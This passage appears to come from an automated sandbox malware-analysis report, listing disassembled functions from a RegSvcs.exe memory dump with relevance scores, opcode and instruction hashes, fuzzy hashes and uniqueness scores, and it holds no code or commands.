                                                          • Instruction Fuzzy Hash: 0D213036600656B7CB25ABA68C44ABBBBF4EF60711F40802FFE5587671E634D940C360
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0142E420 Relevance: .1, Instructions: 88COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 94bc310128f90735db917f2495a822dec77f15865cae7b2af3ba4a6bbbaf44e3
                                                          • Instruction ID: 235cdfd72bbcb1d64679774f7617ce211242d8956406af11bb9573f0870c593a
                                                          • Opcode Fuzzy Hash: 94bc310128f90735db917f2495a822dec77f15865cae7b2af3ba4a6bbbaf44e3
                                                          • Instruction Fuzzy Hash: 9931A432A0152C9BDB31DF19CC41BEA77B9AF25750F4101A6E645BB2A0D6749EC18F90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01464588 Relevance: .1, Instructions: 87COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                          • Instruction ID: 4879363c6d68886271cbe199dd0a5bb984d4e7cfa68073713a1504c79ff83f15
                                                          • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                          • Instruction Fuzzy Hash: 5B21A331A00609EFCF15CF59C980A9EBBB9FF58318F14806AEE199F251D674EE05CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014644B0 Relevance: .1, Instructions: 87COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dbbf8ec31c8dd022419811665c08e3e1a28a9c53fb3fd60f5f58f7889b0c4a22
                                                          • Instruction ID: 79d95bc0db042288d224d18a39c9095690acf39ed99636298d9ba94ba505b425
                                                          • Opcode Fuzzy Hash: dbbf8ec31c8dd022419811665c08e3e1a28a9c53fb3fd60f5f58f7889b0c4a22
                                                          • Instruction Fuzzy Hash: B421E1726047059BCB22CF19C880B6B77E8FB98764F09451AFE549B251D730ED01CBA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0142E388 Relevance: .1, Instructions: 86COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                          • Instruction ID: 63a1a82346da8982d0393ecf540ee4f58417f953407c314333b203a42f29a8f8
                                                          • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                          • Instruction Fuzzy Hash: 4E31A931600614AFE721CF69C884F6AB7F9FF44314F1044AAE5429B2A0E730EE42CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014AE609 Relevance: .1, Instructions: 86COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0c8932478557e0c9371819e2787420944fff9c59a924a11959a05e256d4f494c
                                                          • Instruction ID: c683cd3a0c31bd171ddcd59e89de841239c7246bba0de53c405c2407abab4381
                                                          • Opcode Fuzzy Hash: 0c8932478557e0c9371819e2787420944fff9c59a924a11959a05e256d4f494c
                                                          • Instruction Fuzzy Hash: 4D31B475600205DFCB14CF1CC4849AE77B5FFA4304B96485AE819AB3A1E731EA41CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014B06F1 Relevance: .1, Instructions: 79COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b46c6e79d589ae2512cf8f4f00ceb03803001eafe2d179a749c08c46e4710876
                                                          • Instruction ID: 041cf6481800a501e340da3074b44af86599d5375c0d5fd402cbc728b2f330b0
                                                          • Opcode Fuzzy Hash: b46c6e79d589ae2512cf8f4f00ceb03803001eafe2d179a749c08c46e4710876
                                                          • Instruction Fuzzy Hash: C22180729001299BCF21DF59C881AFFB7F4FF58740B55006AF541AB260D738AD42CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014B019F Relevance: .1, Instructions: 78COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b5e53a315f45de3921bbc7cab98e49421b2f968b4788491e8d1874e45210130b
                                                          • Instruction ID: 418f1cc51127debf765d110d8d77003875dc0bd0e4e78f5de6b46cec22da5f37
                                                          • Opcode Fuzzy Hash: b5e53a315f45de3921bbc7cab98e49421b2f968b4788491e8d1874e45210130b
                                                          • Instruction Fuzzy Hash: 1E218B71600655ABE725DF69C880BAAB7B8FF58740F14006AF944DB7A0D634ED41CBA8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014B0283 Relevance: .1, Instructions: 74COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b2181cd9f82a4eb8ffbb605f6c9e335370033494448b157d11d7ab3baa80d5ed
                                                          • Instruction ID: fb93e8c2aabc702ce93f173c19e582c82af1ba71ed56c6a2e4865dd3435f9ac6
                                                          • Opcode Fuzzy Hash: b2181cd9f82a4eb8ffbb605f6c9e335370033494448b157d11d7ab3baa80d5ed
                                                          • Instruction Fuzzy Hash: 6221B3725053469BE711DF6AC888B9BBBECBFA1640F08445BBD80C7271D734D949C6B1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01452835 Relevance: .1, Instructions: 73COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3e4778af01b3bb7a55e7ba28dba30eadfab07f211fec8ce346e31ec08cc9fb00
                                                          • Instruction ID: e28a35a743745640ae1502a8787b14a093293fa21775a7ecad77f0f645622189
                                                          • Opcode Fuzzy Hash: 3e4778af01b3bb7a55e7ba28dba30eadfab07f211fec8ce346e31ec08cc9fb00
                                                          • Instruction Fuzzy Hash: 6321F532605682DBF722966D8C04F267B95AF41B64F290367FA609B7F2D7B888038250
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0146A30B Relevance: .1, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d67b3e9e68a7a013be4a0f1c7d65c2c98710e6ec844adb95ee89f7e6fcf27eea
                                                          • Instruction ID: d80d0ace4c430ec3b98530ecbf31e3c402ded1f12d77e7d2be63cda662e87b5d
                                                          • Opcode Fuzzy Hash: d67b3e9e68a7a013be4a0f1c7d65c2c98710e6ec844adb95ee89f7e6fcf27eea
                                                          • Instruction Fuzzy Hash: 7921AC76200A11DFC725DF29C800B46B7F5BF28B08F24846DE549CB761E371E842CB94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014EA49A Relevance: .1, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5194b8ef7023a4b19556cb711bb10c44d4cc62d8b9f0110085d5cf570d90943b
                                                          • Instruction ID: 9eb6960513a358d57cb4a26a66ec84ffdd9fb90272600ccac9b38e6731d412a8
                                                          • Opcode Fuzzy Hash: 5194b8ef7023a4b19556cb711bb10c44d4cc62d8b9f0110085d5cf570d90943b
                                                          • Instruction Fuzzy Hash: 7C110672380B12BFE722565A9C05F2776D9DBE4B61F71042AB708DB2B4EBB0DC018795
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014B0946 Relevance: .1, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 95c8e30de0f3d9a53e5387771666de05acb87211fc6eaa82c6e644e68fd0f4a5
                                                          • Instruction ID: 6fba2ff189ba9d7946536b1a5b13477ce2c485e052e3089165c2df70d67f6378
                                                          • Opcode Fuzzy Hash: 95c8e30de0f3d9a53e5387771666de05acb87211fc6eaa82c6e644e68fd0f4a5
                                                          • Instruction Fuzzy Hash: BB21E7B1E00219ABDB20DFAAD9809EEFBF8FFA9610F10012FE505A7254D7749945CB64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014C80A8 Relevance: .1, Instructions: 69COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                          • Instruction ID: 7efbd8a7e63228b3a4a4f138935128fa304b4fd70647d34ea23e31f956239fd4
                                                          • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                          • Instruction Fuzzy Hash: 32218E76A0020AEFDF129F99CC40BAEBBF9EF98720F21441AF940A7261D734D9518B50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01460124 Relevance: .1, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                          • Instruction ID: dc5ab5d01c46e3592b01479f656e6467037462ed094c96e29617d1e5d95e70d1
                                                          • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                          • Instruction Fuzzy Hash: 5311E2B2600605EFE7229F45CC40FDABBBCEB90758F10002BF6008B2A0D676ED45CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01438770 Relevance: .1, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7f1bb81e129c7e40360c3822c93c3cda76b496863d53735ac2eee05f4445db18
                                                          • Instruction ID: 9924d36620603eef61f973fe1c180fd4155f30bc2d2d20885b2fa9c9ccfd018e
                                                          • Opcode Fuzzy Hash: 7f1bb81e129c7e40360c3822c93c3cda76b496863d53735ac2eee05f4445db18
                                                          • Instruction Fuzzy Hash: 6911D3357006129B9B16CF4DC880A17FBE6AF9E710B14416EFE08CF310D7B1E9028790
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0146AAEE Relevance: .1, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                          • Instruction ID: 593b70c0f8bf44c034d381fbb3b9478b62e0af8f922f4c58f5b2a978a085ec98
                                                          • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                          • Instruction Fuzzy Hash: 98218E72600A41DFD7319F4AC540A66FBEAEB94F54F25883EEA45AB720C730EC01CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014380E9 Relevance: .1, Instructions: 66COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7233af6c994b8ef86f84c45803043a789c2704e3992391d7f0a2137a331513fa
                                                          • Instruction ID: 595222abc31739a3bb62c2040fd6ad1feb38833a8815b4fae29a187ff5e6d557
                                                          • Opcode Fuzzy Hash: 7233af6c994b8ef86f84c45803043a789c2704e3992391d7f0a2137a331513fa
                                                          • Instruction Fuzzy Hash: ED215E75A00206DFCB14CF98C581A6EFBB5FB89314F24426EE505AB325C771AD06CBD0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0146674D Relevance: .1, Instructions: 65COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 51b74b7419adc14ce9a9c4766ced38da5982dbf4639edce94537052bf6deec30
                                                          • Instruction ID: d5a4ad463d497dce1f6d70917214c36feb5a7786950fa55c1880549b017cd2ed
                                                          • Opcode Fuzzy Hash: 51b74b7419adc14ce9a9c4766ced38da5982dbf4639edce94537052bf6deec30
                                                          • Instruction Fuzzy Hash: 9E219D75601A01EFD7308F69C880F66B7F8FF44254F45882EE5AAC7260DA74BC40CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014C6870 Relevance: .1, Instructions: 63COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c04f659030b44a896e7bca89f62ac51481f3141ab87bf00da578a5c8b631c994
                                                          • Instruction ID: eeb8f8fa2210dfb1924960dacb7365fd86643fd3e1fb3ac156b246c338a0ce1a
                                                          • Opcode Fuzzy Hash: c04f659030b44a896e7bca89f62ac51481f3141ab87bf00da578a5c8b631c994
                                                          • Instruction Fuzzy Hash: 5011C436240515EBD762DB5AC940FDB77A8EF59A60F12802EF201DB371DA70D901C7A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0145E8C0 Relevance: .1, Instructions: 63COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6ac568363eee3accef2140b083c3f9a31899c4c7d39945ada21c8a1cb5034e0a
                                                          • Instruction ID: 57cf5ebb90989352847c2e096415784eb55a9155ade87134a3e9e5322c6bc6dc
                                                          • Opcode Fuzzy Hash: 6ac568363eee3accef2140b083c3f9a31899c4c7d39945ada21c8a1cb5034e0a
                                                          • Instruction Fuzzy Hash: 5D110C733001249BCF19DB29DC45A6BB666EBD5374B29453ADD22DB3A1E9309902C390
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014666B0 Relevance: .1, Instructions: 61COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 29708ce6ea25cbe17b19a90e8bfebae979e8b137b933b411bbcf518c063d7020
                                                          • Instruction ID: ae01e696ca8c85b2246290521fbb6c39e1393274776bc96e3af780ec658b6a3c
                                                          • Opcode Fuzzy Hash: 29708ce6ea25cbe17b19a90e8bfebae979e8b137b933b411bbcf518c063d7020
                                                          • Instruction Fuzzy Hash: 6311BF76A01255DBCB25CF99D580A5ABBE8AF94615F06407EE9059B320E638DD00CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014FA8E4 Relevance: .1, Instructions: 61COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                          • Instruction ID: 8682f03d55f47ef353e24cef9d85ddf44ab40ae55b877396c5e0d1a1df65ce85
                                                          • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                          • Instruction Fuzzy Hash: 12110436A00915AFDB19CB58CC05F9EFBF5EF94210F15826EE94597350E631AD01CB80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01430AD0 Relevance: .1, Instructions: 61COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                          • Instruction ID: aaf87885af6f574e5d48aca0b23950cd87782f2f7c55eeebee23c42353101690
                                                          • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                          • Instruction Fuzzy Hash: DC2106B5A00B459FE3A0CF29C540B52BBF4FB48B20F10492EE98AC7B50E371E814CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014BE7E1 Relevance: .1, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                          • Instruction ID: ab5c362942b8919a5ceda68643c0dbf02a04bbc0bf28e8105cd37ac382a30b34
                                                          • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                          • Instruction Fuzzy Hash: 0F119131600A01EFE7219F49C880BD77BE5EBD5754F05842EEA09AB270D771DC40D7A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014527ED Relevance: .1, Instructions: 58COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 591a92d93157d21aebb0dd2b00e437d84ed1a060fe49bd167a97c9391620c2c0
                                                          • Instruction ID: e8d7cf8aade9fe557ca47adff12d1917e9a60d4e44da01ed31a529e1482bb842
                                                          • Opcode Fuzzy Hash: 591a92d93157d21aebb0dd2b00e437d84ed1a060fe49bd167a97c9391620c2c0
                                                          • Instruction Fuzzy Hash: 97012671705685ABF316A6AED884F2B6F9DEF90754F19016BFD008B272D974DC02C2B1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01434690 Relevance: .1, Instructions: 57COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 54b1cd865391d48b745cdaa6b2108122b78fa52ae50e3a17db8195be1cff2438
                                                          • Instruction ID: 60e304e0367cccbc6a4d10bf99cd198a3cf562ba1f63c835083de2f5a8768e74
                                                          • Opcode Fuzzy Hash: 54b1cd865391d48b745cdaa6b2108122b78fa52ae50e3a17db8195be1cff2438
                                                          • Instruction Fuzzy Hash: F311A076200645AFDB26CF9AD840F967BA4EBDAB64F18411BF9148B7A0C370E800CF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01504B00 Relevance: .1, Instructions: 57COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 37b5179893f3f38ba0db695c1906df1bc004d2f83c10d3dbae5b907fe134d3e5
                                                          • Instruction ID: 9cb52c5e297db32d6c53a91518f518011ca3d765a2420035b44d1ec03dd6e498
                                                          • Opcode Fuzzy Hash: 37b5179893f3f38ba0db695c1906df1bc004d2f83c10d3dbae5b907fe134d3e5
                                                          • Instruction Fuzzy Hash: D811C636200A119FDB23DAA9D840F5BB7E5FFC4710F154419EB928B6D0DA30E802C790
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01466620 Relevance: .1, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4e9e8e7619cd83f46e53cc3e2599517c557c6f43aff2b1ab3cba8455aca816bd
                                                          • Instruction ID: 7ac9e155f8a689de05c24c81556815ce4e340d98fccb9e3b639fae32595fa6b8
                                                          • Opcode Fuzzy Hash: 4e9e8e7619cd83f46e53cc3e2599517c557c6f43aff2b1ab3cba8455aca816bd
                                                          • Instruction Fuzzy Hash: 1411E972900715ABDB21DF5AD980B5FFBBCFF94754F51045ADA05A7310D730AD018B51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0145EA2E Relevance: .1, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 70181994ab6222e9f059dd54d4aab2d702505d986a9c0465525f0366453770c0
                                                          • Instruction ID: 0ea30b67d8cfe7729cd1bed0cd2acb93dc3569e643238d7c4bd6bc6868d770a5
                                                          • Opcode Fuzzy Hash: 70181994ab6222e9f059dd54d4aab2d702505d986a9c0465525f0366453770c0
                                                          • Instruction Fuzzy Hash: 1201C0725201059FC325DF29D404F66BBE9FB96314F21816BE5049B272E770AD46CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0145E53E Relevance: .1, Instructions: 55COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                          • Instruction ID: 75d1bc65366f75226dbeff8660f62404ea3290a6a3c7f1db284386f790731204
                                                          • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                          • Instruction Fuzzy Hash: D311C2722056C69BFB229B6C8944B26BF94AB01B88F1900A3DE41D7773F338C947C250
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014BE75D Relevance: .1, Instructions: 54COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
